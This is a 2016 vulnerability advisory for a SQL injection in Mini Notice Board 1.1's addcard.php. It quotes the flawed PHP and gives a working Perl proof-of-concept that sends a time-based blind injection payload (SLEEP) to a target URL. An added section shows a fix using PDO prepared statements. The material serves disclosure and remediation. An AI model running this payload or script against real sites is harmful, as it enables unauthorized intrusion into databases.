Mini Notice Board 1.1 SQL Injection
Source: N_A[at]tutanota.com  Author: N_A  Published: 2016-11-04
#!/usr/bin/perl -w

#mininoticeboard_v1.1 SQL Injection Exploit
#==========================================


#Discovered by N_A , N_A[at]tutanota.com
#========================================


#Vendor has been notified
#=========================


#Description
#============

#Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car 
#or lawnmower or want to provide services, they can simply write a card. 
#It supports unlimited Regions.

#https://sourceforge.net/projects/mininoticeboard/


#Vulnerability
#=============

#addcard.php:

#The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection

#$title       = $_GET["title"];
#$body        = $_GET["body"];
#$contact     = $_GET["contact"];
#$address     = $_GET["address"];
#$tel         = $_GET["tel"];
#$date_day    = date("d");
#$date_month  = date("m");
#$date_year   = date("y");
#$romovalcode = genremovalcode();
#$categorie   = $cid;
#if($title!="" && $body!="" && $tel!="" && $contact!="")
#{
#	include 'dbconnect.php';
#	$sqlset["tablename"] = $sqlset["tableprefix"].'content';
#	mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`,
#`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\',
#\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red';


#Proof Of Concept Exploit attached below
#N_A, N_A[at]tutanota.com

use strict;
use LWP::Simple;

my ($url) = @ARGV;

if( not defined $url )
{
	print "=========================================\n";
	print "Mini Notice Board SQL Injection Exploit\n";
	print "\tBy N_A\n";
	print "\n";
	print "$0 [URL]\n";
	print "$0 127.0.0.1/mininoticeboard\n";
	print "=========================================\n";
	exit;
}

my $file = '/addcard.php';	#The Vulnerable .php file
my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card';

my $request ="http://".$url.$file."?".$injection;	#Forming the exploit string

my $content = get $request;
die "Could not get $request" unless defined $content;

#It should hang here for about 5 seconds..... (SLEEP(5)) as per injection

print "##########################\n";
print "SQL Injection Successful!\n";
print "##########################\n"
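
Added example, not part of the original advisory or the project's code: the INSERT from addcard.php rewritten with bound parameters, so the request values are sent as data and never concatenated into the SQL text. The function name add_card(), the 1000-byte length limit, the mnb_ prefix and the in-memory SQLite database standing in for MySQL are assumptions made for illustration; the column names and the test input are taken from the code quoted above.

```php
<?php
// Added example, not the project's code. add_card() and the 1000-byte limit
// are assumptions; column names are the ones in the INSERT quoted above.
function add_card(PDO $db, string $prefix, array $in, int $cid, string $removalCode): bool
{
    // Identifiers cannot be bound as parameters, so allow-list the prefix.
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $v = [];
    foreach (['title', 'body', 'contact', 'address', 'tel'] as $f) {
        $val = $in[$f] ?? '';
        // Reject arrays (title[]=x) and oversized values before touching SQL.
        if (!is_string($val) || strlen($val) > 1000) {
            return false;
        }
        $v[$f] = $val;
    }
    // Same required-field rule as the original if() in addcard.php.
    if ($v['title'] === '' || $v['body'] === '' || $v['tel'] === '' || $v['contact'] === '') {
        return false;
    }
    // Values travel as bound parameters and never become part of the SQL text.
    $stmt = $db->prepare(
        "INSERT INTO `{$prefix}content` (`title`, `content`, `contact`, `address`, `tel`,
            `date_day`, `date_month`, `date_year`, `removalcode`, `categorie`)
         VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
    );
    return $stmt->execute([
        $v['title'], $v['body'], $v['contact'], $v['address'], $v['tel'],
        date('d'), date('m'), date('y'), $removalCode, $cid,
    ]);
}

// Constructed demo: in-memory SQLite stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE `mnb_content` (`title`, `content`, `contact`, `address`, `tel`,
    `date_day`, `date_month`, `date_year`, `removalcode`, `categorie`)');
// Constructed input: the field values used by the proof of concept above.
$in = ['title' => 'pentest', 'tel' => '555', 'contact' => 'blahblah', 'address' => 'blahblah',
       'body' => "blah' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND 'OKSG'='OKSG"];
var_dump(add_card($db, 'mnb_', $in, 1, 'constructed-code'));
// Compare the stored card text with the submitted text, byte for byte.
var_dump($db->query('SELECT `content` FROM `mnb_content`')->fetchColumn() === $in['body']);
```

When the same code runs against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the server performs the parameter binding.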

 